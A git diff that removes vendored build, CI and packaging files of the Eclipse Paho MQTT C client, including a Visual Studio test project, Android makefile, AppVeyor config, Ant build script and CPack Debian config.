-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test9.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj.filters
deleted file mode 100644
index dc608bf..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test9.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/about.html b/thirdparty/paho.mqtt.c/about.html
deleted file mode 100644
index 6555a44..0000000
--- a/thirdparty/paho.mqtt.c/about.html
+++ /dev/null
@@ -1,28 +0,0 @@
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml"><head>
-<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
-<title>About</title>
-</head>
-<body lang="EN-US">
-<h2>About This Content</h2>
- 
-<p><em>December 9, 2013</em></p>	
-<h3>License</h3>
-
-<p>The Eclipse Foundation makes available all content in this plug-in ("Content").  Unless otherwise 
-indicated below, the Content is provided to you under the terms and conditions of the
-Eclipse Public License Version 1.0 ("EPL") and Eclipse Distribution License Version 1.0 ("EDL").
-A copy of the EPL is available at 
-<a href="http://www.eclipse.org/legal/epl-v10.html">http://www.eclipse.org/legal/epl-v10.html</a> 
-and a copy of the EDL is available at 
-<a href="http://www.eclipse.org/org/documents/edl-v10.php">http://www.eclipse.org/org/documents/edl-v10.php</a>. 
-For purposes of the EPL, "Program" will mean the Content.</p>
-
-<p>If you did not receive this Content directly from the Eclipse Foundation, the Content is 
-being redistributed by another party ("Redistributor") and different terms and conditions may
-apply to your use of any object code in the Content.  Check the Redistributor's license that was 
-provided with the Content.  If no such license exists, contact the Redistributor.  Unless otherwise
-indicated below, the terms and conditions of the EPL still apply to any source code in the Content
-and such source code may be obtained at <a href="http://www.eclipse.org/">http://www.eclipse.org</a>.</p>
-
-</body></html>
diff --git a/thirdparty/paho.mqtt.c/android/Android.mk b/thirdparty/paho.mqtt.c/android/Android.mk
deleted file mode 100644
index 6338da5..0000000
--- a/thirdparty/paho.mqtt.c/android/Android.mk
+++ /dev/null
@@ -1,140 +0,0 @@
-# Example: Android Native Library makefile for paho.mqtt.c
-# contributed by Bin Li <bin.li@windriver.com>
-
-LOCAL_PATH := $(call my-dir)
-libpaho-mqtt3_lib_path := ../src
-libpaho-mqtt3_c_includes := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path) \
-	external/hdc/android-ifaddrs \
-	external/openssl/include \
-	external/zlib
-
-# build sample util
-define build_sample_util
-__sample_module:= $1
-__sample_lib:= $2
-include $(CLEAR_VARS)
-LOCAL_C_INCLUDES := $(libpaho-mqtt3_c_includes)
-LOCAL_SHARED_LIBRARIES := $$(__sample_lib)
-LOCAL_MODULE := $$(__sample_module)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_lib_path)/samples/$$(__sample_module).c
-include $(BUILD_EXECUTABLE)
-endef
-
-libpaho-mqtt3_local_src_c_files_common := \
-	$(libpaho-mqtt3_lib_path)/MQTTProtocolClient.c \
-	$(libpaho-mqtt3_lib_path)/Tree.c \
-	$(libpaho-mqtt3_lib_path)/Heap.c \
-	$(libpaho-mqtt3_lib_path)/MQTTPacket.c \
-	$(libpaho-mqtt3_lib_path)/Clients.c \
-	$(libpaho-mqtt3_lib_path)/Thread.c \
-	$(libpaho-mqtt3_lib_path)/utf-8.c \
-	$(libpaho-mqtt3_lib_path)/StackTrace.c \
-	$(libpaho-mqtt3_lib_path)/MQTTProtocolOut.c \
-	$(libpaho-mqtt3_lib_path)/Socket.c \
-	$(libpaho-mqtt3_lib_path)/Log.c \
-	$(libpaho-mqtt3_lib_path)/Messages.c \
-	$(libpaho-mqtt3_lib_path)/LinkedList.c \
-	$(libpaho-mqtt3_lib_path)/MQTTPersistence.c \
-	$(libpaho-mqtt3_lib_path)/MQTTPacketOut.c \
-	$(libpaho-mqtt3_lib_path)/SocketBuffer.c \
-	$(libpaho-mqtt3_lib_path)/MQTTPersistenceDefault.c \
-
-libpaho-mqtt3_local_src_c_files_c := \
-	$(libpaho-mqtt3_lib_path)/MQTTClient.c \
-
-libpaho-mqtt3_local_src_c_files_cs := \
-	$(libpaho-mqtt3_lib_path)/MQTTClient.c \
-	$(libpaho-mqtt3_lib_path)/SSLSocket.c \
-
-libpaho-mqtt3_local_src_c_files_a := \
-	$(libpaho-mqtt3_lib_path)/MQTTAsync.c \
-
-libpaho-mqtt3_local_src_c_files_as := \
-	$(libpaho-mqtt3_lib_path)/MQTTAsync.c \
-	$(libpaho-mqtt3_lib_path)/SSLSocket.c \
-
-# update the header file which normally generated by cmake
-$(shell (cp -f $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)/VersionInfo.h.in $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)/VersionInfo.h))
-$(shell (sed -i "s/@CLIENT_VERSION@/1.2.0/g" $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)/VersionInfo.h))
-$(shell ( sed -i "s/@BUILD_TIMESTAMP@/$(shell date)/g" $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)/VersionInfo.h))
-
-# building static libraries
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3c
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_c)
-include $(BUILD_STATIC_LIBRARY)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3cs
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_CFLAGS += -DOPENSSL
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_cs)
-include $(BUILD_STATIC_LIBRARY)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3a
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/${libpaho-mqtt3_lib_path}
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_a)
-include $(BUILD_STATIC_LIBRARY)
-  
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3as
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/${libpaho-mqtt3_lib_path}
-LOCAL_CFLAGS += -DOPENSSL
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_as)
-include $(BUILD_STATIC_LIBRARY)
-
-# building shared libraries
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3c
-LOCAL_SHARED_LIBRARIES := libdl
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_c)
-include $(BUILD_SHARED_LIBRARY)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3cs
-LOCAL_SHARED_LIBRARIES := libcrypto libssl libdl
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_CFLAGS += -DOPENSSL
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_cs)
-include $(BUILD_SHARED_LIBRARY)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3a
-LOCAL_SHARED_LIBRARIES := libdl
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/${libpaho-mqtt3_lib_path}
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_a)
-include $(BUILD_SHARED_LIBRARY)
- 
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3as
-LOCAL_SHARED_LIBRARIES := libcrypto libssl libdl
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/${libpaho-mqtt3_lib_path}
-LOCAL_CFLAGS += -DOPENSSL
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_as)
-include $(BUILD_SHARED_LIBRARY)
-
-# building samples
-
-$(eval $(call build_sample_util, MQTTAsync_subscribe, libpaho-mqtt3a ) )
-$(eval $(call build_sample_util, MQTTAsync_publish, libpaho-mqtt3a ) )
-$(eval $(call build_sample_util, MQTTClient_publish, libpaho-mqtt3c ) )
-$(eval $(call build_sample_util, MQTTClient_publish_async, libpaho-mqtt3c ) )
-$(eval $(call build_sample_util, MQTTClient_subscribe, libpaho-mqtt3c ) )
-$(eval $(call build_sample_util, paho_c_pub, libpaho-mqtt3a ) )
-$(eval $(call build_sample_util, paho_c_sub, libpaho-mqtt3a ) )
-$(eval $(call build_sample_util, paho_cs_pub, libpaho-mqtt3c ) )
-$(eval $(call build_sample_util, paho_cs_sub, libpaho-mqtt3c ) )
-
diff --git a/thirdparty/paho.mqtt.c/appveyor.yml b/thirdparty/paho.mqtt.c/appveyor.yml
deleted file mode 100644
index ce250bd..0000000
--- a/thirdparty/paho.mqtt.c/appveyor.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-version: 1.2.{build}

-image:

-  - Visual Studio 2013

-  - Visual Studio 2015

-configuration: Debug
-install:
-  - cmd: openssl version
-
-  - cmd: python --version
-

-  - cmd: netsh advfirewall firewall add rule name="Python 2.7" dir=in action=allow program="C:\Python27\python.exe" enable=yes

-

-  - cmd: netsh advfirewall firewall add rule name="Open Port 1883" dir=in action=allow protocol=TCP localport=1883

-

-  - cmd: netsh advfirewall set allprofiles state off
-
-  - ps: Start-Process python -ArgumentList 'test\mqttsas2.py'
-
-  - cmd: C:\Python36\python --version
-
-  - cmd: git clone https://github.com/eclipse/paho.mqtt.testing.git
-
-  - cmd: cd paho.mqtt.testing\interoperability
-
-  - ps: Start-Process C:\Python36\python -ArgumentList 'startbroker.py'
-
-  - cmd: cd ..\..
-

-build_script:

-- cmd: >-

-    mkdir build.paho

-

-    cd build.paho

-

-    echo %APPVEYOR_BUILD_WORKER_IMAGE%

-

-    if "%APPVEYOR_BUILD_WORKER_IMAGE%" == "Visual Studio 2015" call "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" x64

-

-    if "%APPVEYOR_BUILD_WORKER_IMAGE%" == "Visual Studio 2013" call "C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\vcvarsall.bat" x64

-

-    cmake -G "NMake Makefiles" -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=FALSE -DPAHO_BUILD_SAMPLES=TRUE -DCMAKE_BUILD_TYPE=Release -DCMAKE_VERBOSE_MAKEFILE=TRUE ..

-

-    nmake
-

-    ctest -T test -VV

-

-    cd ..

-

-test:

-  assemblies: build/Testing/*/Test.xml

diff --git a/thirdparty/paho.mqtt.c/build.xml b/thirdparty/paho.mqtt.c/build.xml
deleted file mode 100644
index 07a9ec3..0000000
--- a/thirdparty/paho.mqtt.c/build.xml
+++ /dev/null
@@ -1,316 +0,0 @@
-<!--****************************************************************************
-  Copyright (c) 2012, 2017 IBM Corp.
-
-  All rights reserved. This program and the accompanying materials
-  are made available under the terms of the Eclipse Public License v1.0
-  and Eclipse Distribution License v1.0 which accompany this distribution.
-
-  The Eclipse Public License is available at
-     http://www.eclipse.org/legal/epl-v10.html
-  and the Eclipse Distribution License is available at
-    http://www.eclipse.org/org/documents/edl-v10.php.
-
-  Contributors:
-     Ian Craggs - initial API and implementation and/or initial documentation
-*******************************************************************************-->
-
-<project name="MQTT C Client" default="full">
-
-  <taskdef resource="net/sf/antcontrib/antlib.xml">
-    <classpath>
-      <pathelement location="/opt/public/cbi/build/3rdPartyJars/ant-contrib.jar" />
-      <pathelement location="/usr/share/java/ant-contrib.jar" />
-    </classpath>
-  </taskdef>
-
-  <property name="output.folder" value="build/output" />
-  <property name="release.version" value="1.2.0" />
-
-  <property name="libname" value="mqttv3c" />
-  <property name="libname.ssl" value="mqttv3cs" />
-  <property name="libname.async" value="mqttv3a" />
-  <property name="libname.async.ssl" value="mqttv3as" />
-  <property name="ssl" value="yes" />
-  <property name="windows.openssl.folder" value="c:\openssl\bin" />
-  <property name="test.hostname" value="iot.eclipse.org"/>
-  <property name="test.port" value="1883"/>
-  <property name="proxy.port" value="18883"/>
-  <if>
-    <os family="windows"/>
-    <then>
-      <property name="os.family" value="windows" />
-    </then>
-    <else>
-      <if>
-      <os family="mac"/>
-      <then>
-        <property name="os.family" value="mac" />
-      </then>
-      <else>
-        <property name="os.family" value="unix" />
-      </else>
-      </if>
-    </else>
-  </if>
-  <echo message="os.family is '${os.family}'" />
-
-  <target name="init">
-    <tstamp>
-      <format property="buildTimestamp" pattern="yyyyMMddHHmm" />
-    </tstamp>
-
-    <fileset id="sync.source.fileset" dir="src">
-      <include name="*.c"/>
-      <exclude name="MQTTAsync.c"/>
-      <exclude name="MQTTVersion.c"/>
-    </fileset>
-    <pathconvert refid="sync.source.fileset" property="sync.source.files" pathsep=" "/>
-
-    <fileset id="async.source.fileset" dir="src">
-      <include name="*.c"/>
-      <exclude name="MQTTClient.c"/>
-      <exclude name="MQTTVersion.c"/>
-    </fileset>
-    <pathconvert refid="async.source.fileset" property="async.source.files" pathsep=" "/>
-
-  </target>
-
-  <target name="version" depends="init" description="replace tags with the right levels">
-    <property name="build.level" value="${DSTAMP}${TSTAMP}" />
-    <copy file="src/VersionInfo.h.in" tofile="src/VersionInfo.h" overwrite="true"/>
-    <replace file="src/VersionInfo.h" token="@BUILD_TIMESTAMP@" value="${build.level}" />
-    <replace file="src/VersionInfo.h" token="@CLIENT_VERSION@" value="${release.version}" />
-  </target>
-
-  <target name="test" >
-    <!-- display Python version -->
-    <exec executable="python" failonerror="true">
-      <arg line="-V"/>
-    </exec>
-    <exec executable="python" dir="test" spawn="true">
-        <arg value="mqttsas2.py" />
-        <arg value="${test.hostname}" />
-        <arg value="${test.port}" />
-        <arg value="${proxy.port}" />
-    </exec>
-    <if>
-      <os family="windows"/>
-    <then>
-      <foreach target="runAtest" param="aTest" list="test1,test2,test4,test9"/>
-    </then>
-    <else>
-      <foreach target="runAtest" param="aTest" list="test1,test2,test4,test9"/>
-    </else>
-    </if>
-    <foreach target="runSSLtest" param="aTest" list="test3,test5"/>
-  </target>
-
-  <target name="runAtest">
-    <if>
-      <os family="windows"/>
-    <then>
-      <exec executable="cmd.exe" failonerror="true" dir="${output.folder}/test" >
-        <arg value="/c" />
-        <arg value="${aTest}.exe" />
-        <arg value="--connection" />
-        <arg value="tcp://${test.hostname}:${test.port}" />
-        <arg value="--proxy_connection" />
-        <arg value="tcp://localhost:${proxy.port}" />
-        <env key="PATH" path="${output.folder}" />
-      </exec>
-    </then>
-    <else>
-      <exec executable="./${aTest}" failonerror="true" dir="${output.folder}/test" >
-        <arg value="--connection" />
-        <arg value="tcp://${test.hostname}:${test.port}" />
-        <arg value="--proxy_connection" />
-        <arg value="tcp://localhost:${proxy.port}" />
-        <env key="LD_LIBRARY_PATH" path="${output.folder}" />
-        <env key="DYLD_LIBRARY_PATH" path="${output.folder}" />
-      </exec>
-    </else>
-    </if>
-  </target>
-
-  <target name="runSSLtest">
-    <if>
-      <os family="windows"/>
-    <then>
-      <exec executable="cmd.exe" failonerror="true" dir="${output.folder}/test" >
-        <arg value="/c" />
-        <arg value="${aTest}.exe" />
-        <arg value="--hostname" />
-        <arg value="${test.hostname}" />
-        <env key="PATH" path="${output.folder};${windows.openssl.folder}" />
-      </exec>
-    </then>
-    <else>
-      <exec executable="./${aTest}" failonerror="true" dir="${output.folder}/test" >
-        <arg value="--hostname" />
-        <arg value="${test.hostname}" />
-        <env key="LD_LIBRARY_PATH" path="${output.folder}" />
-        <env key="DYLD_LIBRARY_PATH" path="${output.folder}" />
-      </exec>
-    </else>
-    </if>
-  </target>
-
-  <target name="doc" >
-    <if>
-      <available file="/usr/bin/doxygen"/>
-      <then>
-        <mkdir dir="${output.folder}/doc"/>
-        <exec executable="doxygen" dir="src">
-          <arg value="../doc/DoxyfileV3ClientAPI"/>
-        </exec>
-        <exec executable="doxygen" dir="src">
-          <arg value="../doc/DoxyfileV3AsyncAPI"/>
-        </exec>
-        <zip destfile="${output.folder}/MQTTClient_doc.zip">
-          <zipfileset dir="${output.folder}/doc/MQTTClient" />
-        </zip>
-        <zip destfile="${output.folder}/MQTTAsync_doc.zip">
-	        <zipfileset dir="${output.folder}/doc/MQTTAsync" prefix="MQTTAsync/"/>
-        </zip>
-        <delete dir="${output.folder}/doc" />
-      </then>
-      <else>
-        <echo message="doxygen is not available" />
-      </else>
-    </if>
-  </target>
-
-  <target name="build" >
-    <if>
-    <os family="unix"/>
-    <then>
-    <delete dir="${output.folder}" />
-    <!-- display gcc version -->
-    <exec executable="gcc" failonerror="true">
-      <arg line="-v"/>
-    </exec>
-    <if>
-      <available file="/usr/bin/make"/>
-      <then>
-        <exec executable="make" dir="."/>
-      </then>
-    </if>
-    </then>
-    </if>
-    <if>
-    <os family="windows"/>
-    <then>
-    <delete dir="${output.folder}" />
-    <!-- display gcc version -->
-    <exec executable="cl" failonerror="true">
-    </exec>
-    <exec executable="msbuild" dir=".">
-           <arg line='"Windows Build\Paho C MQTT APIs.sln"'/>
-           <arg line="/p:Configuration=Release"/>
-    </exec>
-     </then>
-    </if>
-  </target>
-
-  <target name="package">
-    <mkdir dir="${output.folder}/include"/>
-    <copy overwrite="true" todir="${output.folder}/include">
-      <fileset dir="src" includes="MQTTClient.h,MQTTAsync.h,MQTTClientPersistence.h"/>
-    </copy>
-    <copy overwrite="true" todir="${output.folder}">
-      <fileset dir="." includes="README.md,CONTRIBUTING.md,about.html,notice.html,edl-v10,epl-v10"/>
-    </copy>
-    <mkdir dir="${output.folder}/lib"/>
-    <move overwrite="true" todir="${output.folder}/lib">
-      <fileset dir="${output.folder}" includes="*paho*"/>
-    </move>
-    <mkdir dir="${output.folder}/bin"/>
-    <move overwrite="true" todir="${output.folder}/bin">
-      <fileset dir="${output.folder}/samples" includes="*"/>
-      <fileset dir="${output.folder}" includes="MQTTVersion"/>
-    </move>
-    <copy overwrite="true" todir="${output.folder}/samples">
-      <fileset dir="src/samples" includes="*"/>
-    </copy>
-    <delete>
-       <fileset dir="." includes="eclipse-paho-mqtt-c-windows-${release.version}.zip"/>
-       <fileset dir="." includes="eclipse-paho-mqtt-c-${os.family}-${release.version}.tar.gz"/>
-    </delete>
-
-   <if>
-    <os family="windows"/>
-    <then>
-    <exec executable="c:\cygwin\bin\zip.exe" failonerror="true" dir="${output.folder}">
-      <arg value="-r"/>
-      <arg value="eclipse-paho-mqtt-c-windows-${release.version}.zip"/>
-      <arg value="about.html"/>
-      <arg value="notice.html"/>
-      <arg value="README.md"/>
-      <arg value="CONTRIBUTING.md"/>
-      <arg value="epl-v10"/>
-      <arg value="edl-v10"/>
-      <arg value="include"/>
-	  <arg value="samples"/>
-      <arg value="lib"/>
-      <arg value="bin"/>
-    </exec>
-    </then>
-    <else>
-    <exec executable="tar" failonerror="true" dir="${output.folder}">
-      <arg value="czf"/>
-      <arg value="eclipse-paho-mqtt-c-${os.family}-${release.version}.tar.gz"/>
-      <arg value="about.html"/>
-      <arg value="notice.html"/>
-      <arg value="README.md"/>
-      <arg value="CONTRIBUTING.md"/>
-      <arg value="epl-v10"/>
-      <arg value="edl-v10"/>
-      <arg value="include"/>
-	  <arg value="samples"/>
-      <arg value="lib"/>
-      <arg value="bin"/>
-    </exec>
-    </else>
-    </if>
-
-   <if>
-    <os family="unix"/>
-    <then>
-    <exec executable="tar" failonerror="true" dir=".">
-      <arg value="czf"/>
-      <arg value="${output.folder}/eclipse-paho-mqtt-c-src-${release.version}.tar.gz"/>
-      <arg value="about.html"/>
-      <arg value="notice.html"/>
-      <arg value="README.md"/>
-      <arg value="CONTRIBUTING.md"/>
-      <arg value="epl-v10"/>
-      <arg value="edl-v10"/>
-      <arg value="Makefile"/>
-      <arg value="build.xml"/>
-      <arg value="src"/>
-      <arg value="test"/>
-      <arg value="Windows Build"/>
-    </exec>
-    </then>
-   </if>
-  </target>
-
-  <target name="copy">
-    <if>
-      <available file="/shared/technology"/>
-      <then>
-        <mkdir dir="/shared/technology/paho/C/${release.version}/${build.level}"/>
-       	<echo message="Copying the build output to /shared" />
-      	<copy overwrite="true" todir="/shared/technology/paho/C/${release.version}/${build.level}">
-          <fileset dir="${output.folder}">
-	          <include name="*.gz"/>
-	          <include name="*.zip"/>
-          </fileset>
-        </copy>
-      </then>
-    </if>
-  </target>
-
-  <target name="full" depends="init, version, build, test, doc, package, copy" />
-
-</project>
diff --git a/thirdparty/paho.mqtt.c/cbuild.bat b/thirdparty/paho.mqtt.c/cbuild.bat
deleted file mode 100644
index 22cbd37..0000000
--- a/thirdparty/paho.mqtt.c/cbuild.bat
+++ /dev/null
@@ -1,19 +0,0 @@
-
-setlocal
-
-rmdir /s /q build.paho
-mkdir build.paho
-
-cd build.paho
-
-call "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" x64
-
-cmake -G "NMake Makefiles" -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=FALSE -DPAHO_BUILD_SAMPLES=TRUE -DCMAKE_BUILD_TYPE=Release -DCMAKE_VERBOSE_MAKEFILE=TRUE ..
-
-nmake
-
-ctest -T test -VV
-
-cd ..
-
-endlocal
diff --git a/thirdparty/paho.mqtt.c/cmake/CPackDebConfig.cmake.in b/thirdparty/paho.mqtt.c/cmake/CPackDebConfig.cmake.in
deleted file mode 100644
index c815426..0000000
--- a/thirdparty/paho.mqtt.c/cmake/CPackDebConfig.cmake.in
+++ /dev/null
@@ -1,91 +0,0 @@
-IF (CPACK_GENERATOR MATCHES "DEB")
-    FIND_PROGRAM(DPKG_PROGRAM dpkg DOC "dpkg program of Debian-based systems")
-    IF (DPKG_PROGRAM)
-      EXECUTE_PROCESS(
-        COMMAND ${DPKG_PROGRAM} --print-architecture
-        OUTPUT_VARIABLE CPACK_DEBIAN_PACKAGE_ARCHITECTURE
-        OUTPUT_STRIP_TRAILING_WHITESPACE
-      )
-    ELSE (DPKG_PROGRAM)
-      MESSAGE(FATAL_ERROR "Could not find an architecture for the package")
-    ENDIF (DPKG_PROGRAM)
-
-    EXECUTE_PROCESS(
-      COMMAND lsb_release -si
-      OUTPUT_VARIABLE CPACK_DEBIAN_DIST_NAME
-      RESULT_VARIABLE DIST_NAME_STATUS
-      OUTPUT_STRIP_TRAILING_WHITESPACE
-    )
-
-    IF (DIST_NAME_STATUS)
-       MESSAGE(FATAL_ERROR "Could not find a GNU/Linux distribution name")
-    ENDIF (DIST_NAME_STATUS)
-
-    IF (CPACK_DEBIAN_DIST_NAME STREQUAL "")
-      MESSAGE(FATAL_ERROR "Could not find a GNU/Linux distribution name")
-    ENDIF ()
-
-    EXECUTE_PROCESS(
-      COMMAND lsb_release -sc
-      OUTPUT_VARIABLE CPACK_DEBIAN_DIST_CODE
-      RESULT_VARIABLE DIST_CODE_STATUS
-      OUTPUT_STRIP_TRAILING_WHITESPACE
-    )
-
-    IF (DIST_NAME_STATUS)
-       MESSAGE(FATAL_ERROR "Could not find a GNU/Linux distribution codename")
-    ENDIF (DIST_NAME_STATUS)
-
-    IF (CPACK_DEBIAN_DIST_CODE STREQUAL "")
-      MESSAGE(FATAL_ERROR "Could not find a GNU/Linux distribution codename")
-    ENDIF ()
-
-    SET(CPACK_PACKAGE_VERSION_MAJOR @PAHO_VERSION_MAJOR@)
-    SET(CPACK_PACKAGE_VERSION_MINOR @PAHO_VERSION_MINOR@)
-    SET(CPACK_PACKAGE_VERSION_PATCH @PAHO_VERSION_PATCH@)
-    SET(PACKAGE_VERSION
-        "${CPACK_PACKAGE_VERSION_MAJOR}.${CPACK_PACKAGE_VERSION_MINOR}.${CPACK_PACKAGE_VERSION_PATCH}")
-
-    IF (PACKAGE_VERSION STREQUAL "")
-      MESSAGE(FATAL_ERROR "Could not find a version number for the package")
-    ENDIF ()
-
-    SET(PAHO_WITH_SSL @PAHO_WITH_SSL@)
-
-    MESSAGE("Package version:   ${PACKAGE_VERSION}")
-    MESSAGE("Package built for: ${CPACK_DEBIAN_DIST_NAME} ${CPACK_DEBIAN_DIST_CODE}")
-    IF(PAHO_WITH_SSL)
-        MESSAGE("Package built with ssl-enabled binaries too")
-    ENDIF()
-
-    # Additional lines to a paragraph should start with " "; paragraphs should
-    # be separated with a " ." line
-    SET(CPACK_PACKAGE_NAME "libpaho-mqtt")
-    SET(CPACK_PACKAGE_CONTACT "Eclipse")
-    SET(CPACK_PACKAGE_DESCRIPTION_SUMMARY "Eclipse Paho MQTT C client")
-    SET(CPACK_DEBIAN_PACKAGE_NAME ${CPACK_PACKAGE_NAME})
-    SET(CPACK_DEBIAN_PACKAGE_MAINTAINER
-        "Genis Riera Perez <genis.riera.perez@gmail.com>")
